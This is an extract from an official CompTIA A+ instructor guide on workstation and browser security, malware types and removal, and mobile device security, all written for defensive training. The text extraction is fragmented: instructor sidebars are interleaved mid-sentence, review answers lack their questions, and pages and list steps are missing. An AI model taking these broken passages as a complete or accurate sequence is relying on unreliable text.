if the user’s profile is damaged, if the user’s password is reset by an administrator,
or if Windows is reinstalled. It is possible to back up the key or (on a Windows
domain) to set up recovery agents with the ability to decrypt data.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
592 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
BitLocker can be used with any volumes on fixed (internal) drives. It can also be
used with removable drives in its BitLocker To Go form.
When the data is encrypted, the user must have access to the encryption key to
access it. BitLocker can make use of a trusted platform module (TPM) chip in the
computer to tie use of a fixed disk to a particular motherboard. The TPM is used as
a secure means of storing the encryption key and to ensure the integrity of the OS
used to boot the machine. Alternatively, the key could be stored on a removable
smart card or on a USB stick. The computer’s firmware must support booting from
USB for the last option to work.
The TPM must be configured with an owner password (often the system password set
in firmware). You can manage TPM settings from Windows using the TPM Management
snap-in (select TPM Administration from the BitLocker applet).
During BitLocker setup, a recovery key is also generated. This should be stored on
removable media (or written down) and stored securely (and separately from the
computer). This key can be used to recover the encrypted drive if the startup key
is lost.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 593
Review Activity:
Workstation Security
3
A lockout policy disables the account after a number of incorrect sign-in attempts.
That the antivirus is enabled, is up to date with scan engine components and
definitions, and has only authorized exclusions configured.
• Account management
• Disable AutoRun/AutoPlay
Data-at-rest encryption. In Windows, this can be configured at file level via the
Encrypting File System (EFS) or at disk level via BitLocker.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
594 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 17B
Show
Slide(s) Configure Browser Security
Configure Browser
5
Security
CORE 2 EXAM OBJECTIVES COVERED
Teaching 2.10 Given a scenario, install and configure browsers and relevant security settings.
Tip
This topic covers
browser selection and
security configuration. The web browser has become one of the most important types of software on a
Discuss the centrality computer. As well as viewing basic sites, it is frequently used as the interface for
of the browser to many types of web/cloud apps. Browsers often work in a protected sandbox and
modern computing need to be managed almost like a secondary OS. Understanding the installation
as web/cloud apps and configuration issues will enable you to provision a secure platform for users to
start to replace
access cloud- and web-based services.
locally installed
software. Remind
students of Chrome
OS—essentially a
Browser Selection and Installation
secure browser as the Microsoft’s Internet Explorer (IE) used to be dominant in the browser market, but
operating system.
alternatives such as Google’s Chrome, Mozilla Firefox, and Opera have replaced
Show it. IE itself is no longer supported. Edge, Microsoft’s replacement browser, now
Slide(s) uses the same underlying Chromium codebase as Google Chrome. Apple’s Safari
Browser Selection
browser is tightly integrated with macOS and iOS.
and Installation In some scenarios, it might be appropriate to choose a browser that is different
from these mainstream versions. Alternative browsers may claim to feature strong
Teaching
privacy controls, for instance.
Tip
Explain how to Trusted Sources
verify software from
a trusted source, As the browser is a security-critical type of software, it is particularly important to
mentioning signed
use a trusted source, such as an app store. If installed as a desktop application,
software publishers in
Windows, GPG signing care should be taken to use a reputable vendor. The integrity of the installer should
and verification for also be verified, either by checking the vendor’s code-signing certificate or by
Linux, and how to manually comparing the hash file published by the developer with one computed
manually verify a for the download file.
hash.
Discuss how a browser
might derive from an
untrusted source, such
as new PC bloatware,
one installed as
adware along with
another app or game,
or one installed
by a user without
authorization.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 595
Untrusted Sources
Using a browser from an untrusted source where the installer cannot be verified
through a digital signature or hash is a security risk and likely to expose the user to
unwanted adverts, search engines, and even spyware and redirection attacks. Some
PC vendors bundle browsers that promote various types of adware. Though it is
less common these days, such bloatware should be uninstalled as part of deploying
a new PC. Adware browsers are also often bundled with other software, either
covertly or as a checkable option. This type of potentially unwanted application
(PUA) should also be removed from the computer.
Software that cannot definitively be classified as malicious but that does have increased
privacy risks is often categorized as a potentially unwanted application (PUA).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
596 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Any extension or plug-in could potentially pose a security and/or privacy risk.
As with the browser software itself, you must distinguish between trusted and
untrusted sources when deciding whether to install an add-on. Each browser
vendor maintains a store of extensions, apps, and themes. This code should be
subjected to a review process and use signing/hashing to ensure its integrity. There
are instances of malicious extensions being included in stores, however.
The Google Chrome web store provides an official location for publishing extensions and themes.
(Screenshot courtesy of Google, a trademark of Google LLC.)
Browser Settings
Show Each browser maintains its own settings that are accessed via its Meatball (…) or
Slide(s) Hamburger ( ) menu button. Alternatively, you can open the internal URL, such as
Browser Settings chrome://settings, edge://settings, or about:preferences
(Firefox). The settings configure options such as startup and home pages, tab
behavior, and choice of search engine and search behavior.
The Internet Explorer browser is configured via the Internet Options applet. IE is usually
installed by default and might be used for compatibility with company intranets that
have not been upgraded to more modern technologies. IE should not be used for
general web browsing or to access modern web applications.
Browsers also have advanced settings that are accessed via a URL such as
chrome://flags or about:config.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 597
Password Manager
A typical user might be faced with having to remember dozens of sign-ins for
different services and resort to using the same password for each. This is unsecure
because just one site breach could result in the compromise of all the user’s digital
identities. Each major browser now supports password manager functionality.
This can suggest a strong password at each new account sign-up or credential reset
and autofill this value when the user needs to authenticate to the site. If the user
signs-in to the browser, the passwords will be available on each device.
One drawback of password managers is that not all sites present the sign-in form in
a way that the password manager will recognize and trust as secure. Most of them
allow you to copy and paste the string as a fallback mechanism.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
598 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Browsing CompTIA’s home page in Mozilla’s Firefox browser. When the browser trusts the
certificate issued to www.comptia.org, it displays a lock icon and identifies the URL as HTTPS. Select
the lock icon to inspect the certificate as further verification. The site’s certificate was issued by the
public CA DigiCert, Inc. (Screenshot courtesy of CompTIA and Mozilla.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 599
If the certificate is valid and trusted, a padlock icon is shown. Select the icon to view
information about the certificate and the CA guaranteeing it.
CA root certificates must be trusted implicitly, so it would obviously be highly
advantageous if a malicious user could install a bogus root certificate and become
a trusted root CA. Installing a trusted root certificate requires administrative
privileges. On a Windows PC, most root certificate updates are performed as part
of Windows Update or installed by domain controllers or administrators as part of
running Active Directory. There have been instances of stolen certificates and root
certificates from CAs being exploited because of weaknesses in the key used in the
certificate.
While Edge uses the Windows certificate store, third-party browsers maintain
a separate store of trusted and personal certificates. When using enterprise
certificates for internal sites and a third-party browser, you must ensure that the
internal CA root certificate is added to the browser.
Mozilla Firefox’s trusted certificate store showing the DigiCert root certificates that are trusted
authorities. (Screenshot courtesy of Mozilla.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
600 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 601
Aside from the issue of being tracked by websites, there are privacy concerns about
the data a browser might store on the device as you use it. This browsing history
can be managed by two methods:
• Clearing cache and browsing data options are used to delete browsing
history. By default, the browser will maintain a history of pages visited, cache
files to speed up browsing, and save text typed into form fields. On a public
computer, it is best practice to clear the browsing history at the end of a session.
You can configure the browser to do this automatically or do it manually.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
602 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Browser Security
6
No. The chrome://flags page is for advanced configuration settings. General user,
security, and privacy settings are configured via chrome://settings.
That the browser address bar displays the lock icon to indicate that the site uses
a trusted certificate. This validates the site identity and protects information
submitted via the form from interception.
4. True or false? Using a browser’s incognito mode will prevent sites from
recording the user’s IP address.
False. Incognito mode can prevent the use of cookies but cannot conceal the user’s
source IP address. You do not need to include this in your answer, but the main way
to conceal the source IP address is to connect to sites via a virtual private network
(VPN).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 603
Topic 17C
Troubleshoot Workstation
Security Issues
5
Despite all your efforts to configure workstation security according to best Teaching
practices—securing user accounts, installing antivirus software, updating with Tip
patches, and encrypting data—there will be times when those procedures fail This lesson moves
to work, and you will be faced with security issues such as malware infection. on from configuring
As a CompTIA A+ PC technician, it is essential that you be able to identify types security settings to
looking at how to
of malware, the symptoms of security issues, and the steps to take to remove troubleshoot common
malicious code and prevent it from reinfecting computers and networks. security issues, such
as malware infection.
Malware Vectors Show
Slide(s)
Malware is usually simply defined as software that does something bad, from
Malware Vectors
the perspective of the system owner. The more detailed classification of different
malware types helps to identify the likely source and impact of a security incident. Teaching
Some malware classifications focus on the vector used by the malware. The vector Tip
is the method by which the malware executes on a computer and potentially
When classifying
spreads to other network hosts. malware, it’s helpful to
The following categories describe some types of malware according to vector: distinguish between
the method used to
• Viruses—These are concealed within the code of an executable process image infect the computer
stored as a file on disk. In Windows, executable code has extensions such (vector) and the
as .EXE, .MSI, .DLL, .COM, .SCR, and .JAR. When the program file is executed, payload/threat-actor
motivation arising
the virus code is also able to execute with the same privileges as the infected from successful
process. The first viruses were explicitly created to infect other files as rapidly as infection. Here,
possible. Modern viruses are more likely to use covert methods to take control discuss the main types
of the host. of malware vector.
Worms and fileless
• Boot sector viruses—These infect the boot sector code or partition table on a malware aren’t
disk drive. When the disk is attached to a computer, the virus attempts to hijack content examples,
the bootloader process to load itself into memory. but students should
be made aware of
• Trojans—This is malware concealed within an installer package for software that these types. Explain
appears to be legitimate. The malware will be installed alongside the program that fileless malware
and execute with the same privileges. It might be able to add itself to startup exploits software
vulnerabilities and
locations so that it always runs when the computer starts or the user signs in.
the native scripting
This is referred to as persistence. environment to
execute without
necessarily requiring
the user to authorize a
setup program to run
or a disk to be made
accessible.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
604 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Fileless malware—This refers to malicious code that uses the host’s scripting
environment, such as Windows PowerShell or PDF JavaScript, to create new
malicious processes in memory. As it may be disguised as script instructions or a
document file rather than an executable image file, this type of malware can be
harder to detect.
Malware Payloads
Show Classifying malware by payload is a way of identifying what type of actions the code
Slide(s) performs other than simply replicating or persisting on a host.
Malware Payloads
Backdoors
Teaching
Modern malware is usually designed to implement some type of backdoor, also
Tip
referred to as a remote access Trojan (RAT). Once the malware is installed, it
Explain that payload is
allows the threat actor to access the PC, upload/exfiltrate data files, and install
the action taken by the
malware (or the threat additional malware tools. This could allow the attacker to use the computer
actor via the malware) to widen access to the rest of the network or to add it to a botnet and launch
once it has infected distributed denial of service (DDoS) attacks or mass-mail spam.
the computer.
Whether a backdoor is used as a standalone intrusion mechanism or to manage
bots, the threat actor must establish a connection from the compromised host to
a command and control (C2 or C&C) host or network. There are many means of
implementing a covert C&C channel to evade detection and filtering. Historically,
the Internet relay chat (IRC) protocol was popular. Modern methods are more likely
to use command sequences embedded in HTTPS or DNS traffic.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 605
Keyloggers are not only implemented as software. A malicious script can transmit
key presses to a third-party website. There are also hardware devices to capture key
presses to a modified USB adapter inserted between the keyboard and the port.
Actual Keylogger—Windows software that can run in the background to monitor different kinds of
computer activity (opening and closing programs, browsing websites, recording keystrokes, and
capturing screenshots). (Screenshot courtesy of actualkeylogger.com)
Rootkits
In Windows, malware can only be manually installed with local administrator
privileges. This means the user must be confident enough in the installer package to
enter the credentials or accept the User Account Control (UAC) prompt. Additionally,
Windows tries to protect the OS files from abuse of administrator privileges. Critical
processes run with a higher level of privilege (SYSTEM). Consequently, Trojans
installed in the same way as regular software cannot conceal their presence entirely
and will show up as a running process or service. Often the process image name is
configured to be similar to a genuine executable or library to avoid detection. For
example, a Trojan may use the filename “run32d11” to masquerade as “run32dll”.
To ensure persistence, the Trojan may have to use a registry entry or create itself as
a service. All these techniques are relatively easy to detect and remediate.
If the malware can be delivered as the payload for an exploit of a severe
vulnerability, it may be able to execute without requiring any authorization using
SYSTEM privileges. Alternatively, the malware may be able to use an exploit to
escalate privileges after installation. Malware running with this level of privilege
is referred to as a rootkit. The term derives from UNIX/Linux where any process
running as root has unrestricted access to everything from the root of the file
system down.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
606 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
In theory, there is nothing about the system that a rootkit could not change. In
practice, Windows uses other mechanisms to prevent misuse of kernel processes,
such as code signing (microsoft.com/security/blog/2017/10/23/hardening-
the-system-and-maintaining-integrity-with-windows-defender-system-guard).
Consequently, what a rootkit can do depends largely on adversary capability and
level of effort. When dealing with a rootkit, you should be aware that there is the
possibility that it can compromise system files and programming interfaces so that
local shell processes, such as Explorer or Task Manager on Windows, ps or top
on Linux, and port-listening tools (netstat, for example), no longer reveal their
presence (when run from the infected machine, that is). A rootkit may also contain
tools for cleaning system logs, further concealing its presence.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 607
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
608 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Additional executable files with names similar to those of authentic system files
and utilities, such as scvhost.exe or ta5kmgr.exe.
• Altered system files or personal files with date stamps and file sizes that are
different from known-good versions.
These sorts of issues are less likely to have other causes so you should quarantine
the system and investigate it closely.
Redirection
Redirection is where the user tries to open one page but gets sent to another.
Often this may imitate the target page. In adware, this is just a blunt means of
driving traffic through a site, but spyware may exploit it to capture authentication
details.
Redirection may occur when entering URL web addresses manually or when
performing searches. If a user experiences redirection, check the HOSTS file
for malicious entries. HOSTS is a legacy means of mapping domain names to IP
addresses and is a popular target for malware. Also verify which DNS servers
the client is configured to use. Compare the search results returned by a suspect
machine with those from a known-good workstation.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 609
Certificate Warnings
When you browse a site using a certificate, the browser displays the information
about the certificate in the address bar. If the certificate is untrusted or otherwise
invalid, the padlock icon is replaced by an alert icon, the URL is displayed with
strikethrough formatting, and the site content is likely to be blocked by a warning
message.
There are many causes of certificate warnings. Some of the most common are:
• The certificate is self-signed or issued by a CA that is not trusted.
• The FQDN requested by the browser is different from the subject name listed in
the certificate.
Each of these warnings could either indicate that the site is misconfigured or that
some malware on the computer is attempting to redirect the browser to a spoofed
page. Analyze the certificate information and the URL to determine the likely cause.
Improper use of certificates is also an indicator for a type of on-path attack by a
malicious proxy:
1. A user requests a connection to a secure site and expects the site’s certificate.
2. Malware on the host or some type of evil-twin access point intercepts this
request and presents its own spoofed certificate to the user/browser.
Depending on the sophistication of the attack, this spoof certificate may or
may not produce a browser warning. If the malware is able to compromise the
trusted root certificate store, there will be no warning.
4. The user may think he or she has a secure connection to the site, but in fact
the malware is in the middle of the session and is able to intercept and modify
all the traffic that would normally be encrypted.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
610 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Threats discovered by Windows Defender Antivirus. These are classified as potentially unwanted
applications (PUAs) rather than malware. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 611
Show
Slide(s)
Infected Systems
Quarantine
Microsoft’s Security Intelligence knowledge base can be used to obtain additional information
about threats discovered by Windows Defender Antivirus. You can use this information to Teaching
determine indicators for manual verification, the impact of infection, and likelihood of other Tip
systems being compromised. (Screenshot courtesy of Microsoft.)
Note that while
students should
respect the sequence
Infected Systems Quarantine established in the
model, in practical
Following the seven-step procedure, if symptoms of a malware infection are terms quarantine
detected and verified, the next steps should be to apply a quarantine and disable is likely to precede
detailed investigation/
System Restore. verification as that
type of research
Quarantine Infected Systems can be performed
more safely once the
If a system is “under suspicion,” do not allow users with administrative privileges to suspect host has been
sign in—either locally or remotely—until it is quarantined. This reduces the risk that sandboxed.
malware could compromise a privileged account. Optionally, expand
Putting a host in quarantine means that it is not able to communicate on the main on the injunction
against signing in with
network. Malware such as worms propagate over networks. A threat actor might privileged accounts
use backdoor malware to attempt to access other systems. This means that one of by explaining that
the first actions should be to disconnect the network link. advanced malware
can abuse system
In practical terms, you might quarantine a host before fully verifying malware infection. privileges to try to
A strong suspicion of infection by advanced malware might be sufficient risk to warrant grab password hashes
quarantining the host as a precaution. and authorization
tokens from memory
(pass-the-hash and
golden-ticket attack
types).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
612 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Microsoft’s Windows Defender Antivirus uses a system of continual threat/definition updates. When
remediating a system, check that these updates are being applied and have not been disabled by
the malware. (Screenshot courtesy of Microsoft.)
While there were differences in the past, the terms antivirus and anti-malware
are synonymous. Almost every antivirus product protects against a broad range
of virus, worm, fileless malware, Trojan, rootkit, ransomware, spyware, and
cryptominer threats.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 613
If a file is infected with a virus, you can (hopefully) use antivirus software to try
to remove the infection (cleaning), quarantine the file (the antivirus software
blocks any attempt to open it), or erase the file. You might also choose to ignore a
reported threat if it is a false positive, for instance. You can configure the default
action that software should attempt when it discovers malware as part of a scan.
Recovery Mode
Infection by advanced malware might require manual removal steps to disable
persistence mechanisms and reconfiguration of the system to its secure baseline.
For assistance, check the website and support services for your antivirus software,
but in general terms, manual removal and reconfiguration will require the following
tools:
• Use Task Manager to terminate suspicious processes.
• Use msconfig to perform a safe boot or boot into Safe Mode, hopefully
preventing any infected code from running at startup.
• Boot the computer using the product disc or recovery media, and use the
Windows Preinstallation Environment (WinPE) to run commands from a clean
command environment.
• Remove the disk from the infected system, and scan it from another system,
taking care not to allow cross-infection.
OS Reinstallation
Antivirus software will not necessarily be able to recover data from infected files.
Also, if malware gains a persistent foothold on the computer, you might not be
able to run antivirus software anyway and would have to perform a complete
system restore. This involves reformatting the disk, reinstalling the OS and software
(possibly from a system image snapshot backup), and restoring data files from a
(clean) backup.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
614 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Validate any other security-critical services and settings that might have been
compromised by the malware.
As a final step, complete another antivirus scan; if the system is clean, then remove
the quarantine and return it to service.
• Secure use of software such as browsers and email clients plus appropriate use
of Internet access, including social networking sites.
Continuing education programs ensure that the participants do not treat a single
training course or certificate as a sort of final accomplishment. Skills and knowledge
must be continually updated to cope with changing threat types.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 615
Review Activity:
Workstation Security Issues
6
3. Early in the day, a user called the help desk saying that his computer is
running slowly and freezing up. Shortly after this user called, other help
desk technicians who overheard your call also received calls from users
who report similar symptoms. Is this likely to be a malware infection?
It is certainly possible. Software updates are often applied when a computer is started
in the morning, so that is another potential cause, but you should investigate and log
a warning so that all support staff are alerted. It is very difficult to categorize malware
when the only symptom is performance issues. However, performance issues could
be a result of a badly written Trojan, or a Trojan/backdoor application might be using
resources maliciously (for DDoS, Bitcoin mining, spam, and so on).
4. You receive a support call from a user who is “stuck” on a web page. She
is trying to use the Back button to return to her search results, but the
page just displays again with a pop-up message. Is her computer infected
with malware?
If it only occurs on certain sites, it is probably part of the site design. A script
running on the site can prevent use of the Back button. It could also be a sign
of adware or spyware though, so it would be safest to scan the computer using
up-to-date anti-malware software.
It would be highly unlikely for a commercial bank to allow its website certificates
to run out of date or otherwise be misconfigured. You should strongly suspect
redirection by malware or a phishing/pharming scam.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
616 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lesson 17
Summary
7
Show You should be able to configure workstation and Windows OS settings to meet best
Slide(s) practices for security; install and configure secure browsers; and detect, remove,
Summary and prevent malware using the appropriate tools and best practice procedures.
• Antivirus and firewall settings and updates, using built-in Windows Defender
or third-party products.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 617
• Apply the CompTIA best practice model for malware removal: 1. Investigate and
verify malware symptoms, 2. Quarantine infected systems, 3. Disable System
Restore in Windows, 4. Remediate infected systems (a. Update anti-malware
software and b. Scanning and removal techniques [safe mode/preinstallation
environment]), 5. Schedule scans and run updates, 6. Enable System Restore
and create a restore point Windows, and 7. Educate the end user.
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 18
Supporting Mobile Software
1
LESSON INTRODUCTION
Mobile devices have largely replaced computers as contact-manager and Show
web-browsing tools, and there is little choice but for an enterprise network to Slide(s)
support their use. The huge variety of device types and mobile OS types and Objectives
versions makes managing their use a complex task, however.
Teaching
As a certified CompTIA A+ technician, you will be expected to support and
Tip
troubleshoot mobile computing devices in both personal and enterprise contexts.
With the proper information and the right skills, you will be ready to support these This topic completes
the security-focused
devices as efficiently as you support their desktop counterparts. block by covering
mobile OS/app
Lesson Objectives security configuration.
We also cover the
troubleshooting
In this lesson, you will:
objectives.
• Configure mobile OS security.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
620 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 18A
Show
Slide(s)
Configure Mobile OS Security
Configure Mobile
2
OS Security
CORE 2 EXAM OBJECTIVES COVERED
Teaching 2.7 Explain common methods for securing mobile and embedded devices.
Tip
This topic covers the
default features of iOS
It is critical that the organization’s mobile-device security practices be specified via
and Android that can
be used to secure use policies, procedures, and training. It is easy for mobile devices to be forgotten or
of mobile devices plus overlooked because they don’t reside, or “live,” in the workplace in the same way
MDM features that can that desktop computers do. Procedural and technical controls to manage these
enforce policies when mobile devices mitigate the risk that they may introduce vulnerabilities in the
a mobile is used on an company's network security.
enterprise network.
Screen Locks
Show If threat actors can access smartphones or tablets, they can obtain a huge amount
Slide(s) of information with which to launch further attacks. Apart from confidential data
Screen Locks files that might be stored on the device, it is highly likely that the user has cached
passwords for services such as email or remote access VPN and websites. In
Teaching addition to this, access to contacts and message history (SMS, text messaging,
Tip email, and IM) greatly assists social engineering attacks. Consequently, it is
Explain the imperative that mobiles be protected against loss, theft, and lunchtime attacks
importance of locking by a screen lock.
the device to mitigate
lunchtime attacks and A screen lock activates if the device is unused or if the user presses the power
risks from loss or theft button. The user must perform a gesture to unlock the device. A swipe gesture
and the pros and cons means that access to the device is unauthenticated. Simply swiping across the
of different methods. screen will unlock the device. While this might be suitable for a tablet deployed
for shared or public use, access to a personal device must be protected by an
authentication mechanism:
• Personal identification number (PIN) or password—Most devices require
a PIN or password to be configured to enable screen lock authentication
and generate an encryption key. The PIN can act as a primary or backup
authentication method. If the device is configured to limit the number of
attempts, a 4- or 6-digit PIN should offer adequate security for general users
as long as the chosen PIN is not a simple sequence (1234 or 4321) or an easily
guessable date. If there is a high risk of compromise, a strong password should
be configured.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 621
Configuring screen lock options in iOS (left) and Android (right). (Screenshots reprinted with
permission from Apple Inc. and Android platform, a trademark of Google LLC.)
A screen lock can be configured to restrict failed login attempts. This means that
if an incorrect passcode or bio gesture is used, the device locks for a set period.
This could be configured to escalate—so the first incorrect attempt locks the device
for 30 seconds, while the third locks it for 10 minutes, for instance. This deters
attempts to guess the passcode or use a spoofed biometric.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
622 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The Google Play store has a Play Protect feature that is enabled by default. This provides
built-in malware scanning and threat detection. (Screenshot courtesy of Google Play Store,
a trademark of Google LLC.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 623
Firewall Apps
There are also firewall apps for mobile devices. These can be used to monitor app
activity and prevent connections to ports or IP addresses. One issue for firewalls is
that they must be able to control other apps and therefore logically work at a higher
permission level (root). Installing an app with root access is challenging, however.
"No-root" firewalls work by creating a virtual private network (VPN) and then
controlling app access to the VPN.
• Choose your own device (CYOD)—Similar to COPE but the employee is given a
choice of device from a list.
Endpoint management software such as Microsoft Intune can be used to approve or prohibit apps.
(Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
624 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
When the device is enrolled with the management software, it can be configured
with policies to allow or restrict use of apps, corporate data, and built-in functions
such as a video camera or microphone. Policies can also be set to ensure the device
patch status is up to date, that antivirus software is present and updated, and that a
device firewall has been applied and configured correctly.
A company needs to create a profile of security requirements and policies to
apply for different employees and different sites or areas within a site. For example,
it might be more secure to disable the camera function of any smartphone while
on site, but users might complain that they cannot use their phones for video calls.
A sophisticated security system might be able to apply a more selective policy and
disable the camera only when the device is within an area deemed high risk from
a data confidentiality point-of-view. Some policies can be implemented with a
technical solution; others require "soft" measures, such as training and disciplinary
action.
• Email data and any apps using the "Data Protection" option are subject to a
second round of encryption using a key derived from and protected by the user's
credential. This provides security for data if the device is stolen. Not all user data
is encrypted using the "Data Protection" option; contacts, SMS messages, and
pictures are not, for example.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 625
In iOS, the data protection encryption option is enabled when a passcode is configured (left, at
bottom). Android uses file encryption for user data and settings when a lock is configured (right).
(Screenshots reprinted with permission from Apple Inc. and Android platform, a trademark of
Google LLC.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
626 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Using Google’s default remote backup service. Note that SMS and call history data are not
included. (Screenshot courtesy of Google One™ subscription service, a trademark of Google LLC.)
As well as cloud services, a device can be backed up to a PC. For example, iOS
supports making backups to macOS or to Windows via the iTunes program. A
third option is for MDM software to be configured to back up user devices or the
container workspace automatically.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 627
You can use the Google’s Find Device app to locate an Android device and remotely lock or wipe it
(or send the current holder a polite message to please return it ASAP). (Screenshot courtesy of
Google, a trademark of Google LLC.)
Other functions of a locator app are to remotely lock the device, display a “Please
return” message on the screen, call the device regularly at full volume, disable
features such as the wallet, prevent changes to the passcode, and prevent
location/network services from being disabled.
If a device is lost with no chance of recovery, it may be necessary to perform
some level of remote wipe to protect data and account credentials. A device wipe
performs a factory default reset and clears all data, apps, and settings.
When a wipe is being performed due to risks to corporate data, a device wipe might
not be appropriate. If the device is enrolled with MDM, an enterprise wipe can
be performed against the corporate container only. This removes any corporate Show
accounts and files but leaves personal apps, accounts, settings, and files untouched. Slide(s)
Internet of Things
Internet of Things Security Security
The term Internet of Things (IoT) is used to describe the global network of Teaching
personal devices, home appliances, home control systems, vehicles, and other Tip
items that have been equipped with sensors, software, and network connectivity. Explain that IoT
These features allow these types of objects to communicate and pass data among devices have very
themselves and other traditional systems such as computer servers. similar security
concerns to
workstation/mobile:
monitor security
vulnerabilities and
apply patches,
install to a hardened
configuration, and
only deploy on
enterprise networks
with authorization.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
628 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Philips Hue smart lighting management app. The management app connects to the hub (a Hue
Bridge) via Wi-Fi. The hub communicates with each light device using the Zigbee wireless mesh
networking protocol. Note that features such as out-of-home control or integration with other
control systems could widen the potential attack surface if this type of device is deployed in an
office. (Screenshot used with permission from Koninklijke Philips N.V.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
